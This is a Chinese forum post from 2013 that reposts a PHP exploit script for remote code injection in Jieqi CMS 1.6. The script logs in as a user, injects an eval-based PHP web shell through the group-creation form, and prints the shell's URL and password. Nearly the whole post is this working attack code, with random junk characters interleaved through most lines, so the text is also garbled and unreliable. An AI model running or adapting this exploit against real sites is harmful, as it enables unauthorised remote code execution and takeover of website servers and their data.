杰奇网站管理系统(简称 JIEQI CMS,中国国家版权局著作权登记号:2006SR03382)是一套模块化的网站架设系统,具备简单灵活、性能卓越、安全可靠等特性。我们为大家提供了目前最流行的杰奇小说连载系统、杰奇原创漫画系统及数字出版解决方案,并提供各类网站定制服务。& P0 s. b; O0 a* m5 G8 l! G5 J
- @! X; F7 w7 p8 H$ w5 V) G/ S9 Y
3 }+ l. m+ d, Z3 h: ~; U该系统存在多个远程安全漏洞,今天报告的这个是1.6版本的一个远程代码执行漏洞,应该有2年多历史了。
1 x( b; A4 W- M 需要有一个能创建圈子的用户。 F- Q/ I/ @4 H+ R; Z9 ~3 _1 g7 t D
7 h& G) ?) j* a* I
<?php
( E! \6 P) W0 }, y5 F& v7 o- T+ e" C 9 Q8 _! H5 A+ y W6 i7 n
print_r('" \. G2 `9 e9 o& K6 U
+---------------------------------------------------------------------------+
* T: u+ ^4 @8 Z6 nJieqi CMS V1.6 PHP Code Injection Exploit1 m1 c9 w h) g2 ^# L
by flyh4t- W; U2 {, z) C! h8 J
mail: phpsec at hotmail dot com* m- L6 G( j6 r2 I( r
team: http://www.wolvez.org+ ]- n2 O# c$ q
+---------------------------------------------------------------------------+1 \0 o1 C( {3 J1 r
'); /**/ j! {' [8 O4 l! `4 e5 e- [9 F. [) g
* works regardless of php.ini settings
! j8 Q, t: h, h3 e2 o4 _*/ if ($argc < 5) { print_r('
* w2 i7 `9 B1 p4 Y+---------------------------------------------------------------------------+
, j; X. j# B3 }7 L6 r* {Usage: php '.$argv[0].' host path username
8 S ^4 @5 H+ E0 P. `+ _host: target server (ip/hostname)+ l8 a$ R0 T* F O
path: path to jieqicms 4 j, `% x. U9 E" `5 z3 T
uasename: a username who can create group
+ S0 ?2 A8 F7 e! _6 jExample:
, k0 Y/ r# c" K% bphp '.$argv[0].' localhost /jieqicmsv1.6/ vipuser1 password% j! }! E2 Q1 p. {
+---------------------------------------------------------------------------+
* j1 b% R# Y" e+ B1 c% j'); exit; } error_reporting(7); ini_set('max_execution_time', 0); $host = $argv[1]; $path = $argv[2]; $username = $argv[3]; $password = $argv[4]; /*get cookie*/ $cookie_jar_index = 'cookie.txt'; $url1 = "http://$host/$path/login.php"; $params = "password=$password&username=$username&usecookie=86400&submit=%26%23160%3B%B5%C7%26%23160%3B%26%23160%3B%C2%BC%26%23160%3B&action=login&jumpreferer=1"; $curl1 = curl_init(); curl_setopt($curl1, CURLOPT_URL, $url1); curl_setopt($curl1, CURLOPT_COOKIEJAR, $cookie_jar_index); curl_setopt($curl1, CURLOPT_POST, 1); curl_setopt($curl1, CURLOPT_POSTFIELDS, $params); ob_start(); $data1 = curl_exec($curl1); if ($data1 === FALSE) { echo "cURL Error: " . curl_error($ch); exit('exploit failed'); } curl_close($curl1); ob_clean(); /*get shell*/ $params ='-----------------------------23281168279961
5 s4 B5 s* [$ K4 xContent-Disposition: form-data; name="gname"1 D, ~% D0 f( g: \) j7 K" z. R
" j( `, m7 X# J4 q. y) X'; $params .="';"; $params .='eval($_POST[p]);//flyh4t
- e; c- J% {! U" u5 }0 b-----------------------------23281168279961" \7 e7 z5 ^. D: g
Content-Disposition: form-data; name="gcatid"
. v; Y9 J0 y( ?7 f5 J) v
4 n/ B) w2 y; I, G7 R% D1
/ h% R6 S' Y* u3 E-----------------------------23281168279961
' M% U) u( T0 U2 O. CContent-Disposition: form-data; name="gaudit"
' A: |* [* W" w1 A" a& N- Z; ?' ~3 J: j
/ c" f2 z; t* S% c4 `+ ]7 H; z1
9 I. Z! L5 _, A D. x" q-----------------------------23281168279961
0 w" j# i1 F. L/ @Content-Disposition: form-data; name="gbrief"
K% W' f2 z0 V) x& @* T $ y* Z# m( z; c8 s- c
1" g1 ]5 \: g5 w
-----------------------------23281168279961--) N! Q( s- }; {0 a/ e4 ]
'; $url2 = "http://$host/$path/modules/group/create.php"; $curl2 = curl_init(); $header =array( 'Content-Type: multipart/form-data; boundary=---------------------------23281168279961' ); curl_setopt($curl2, CURLOPT_URL, $url2); curl_setopt($curl2, CURLOPT_HTTPHEADER, $header); curl_setopt($curl2, CURLOPT_COOKIEFILE, $cookie_jar_index); curl_setopt($curl2, CURLOPT_POST, 1); curl_setopt($curl2, CURLOPT_POSTFIELDS, $params); ob_start(); curl_exec($curl2); curl_close($curl2); $resp = ob_get_contents(); //$rs就是返回的内容 ob_clean(); www.2cto.com s$ Z. }/ a) a& |' p& g: J6 J+ `
4 \9 k3 {4 c& w! _preg_match('/g=([0-9]{1,4})/', $resp, $shell); //print_r($shell); //print_r($resp); $url = "http://$host/$path/files/group/userdir/0/$shell[1]/info.php"; echo "view you shell here(password:p)\r\n" ; echo $url; |
发表于 2013-2-23 11:28:09
收藏
支持
反对